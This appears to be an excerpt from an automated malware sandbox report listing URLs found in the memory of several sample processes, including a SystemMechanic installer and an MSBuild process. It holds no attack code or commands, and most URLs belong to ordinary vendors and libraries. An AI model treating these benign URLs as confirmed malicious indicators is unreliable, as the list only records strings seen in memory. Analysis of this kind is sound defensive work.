Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071517610.00000240FE690000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000003.2272268164.0000000002612000.00000004.00001000.00020000.00000000.sdmp, u5c4.3.exe, 00000005.00000000.1829719005.000000000041C000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000002.00000002.1888066079.00000000044B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.0000000005632000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.0000000003758000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.0000000005766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u5c4.0.exe, u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u5c4.0.exe, 00000001.00000002.2519749464.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.avira.com/download/
Source: u5c4.3.exe, 00000005.00000003.2272268164.00000000025D4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003009000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000309D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
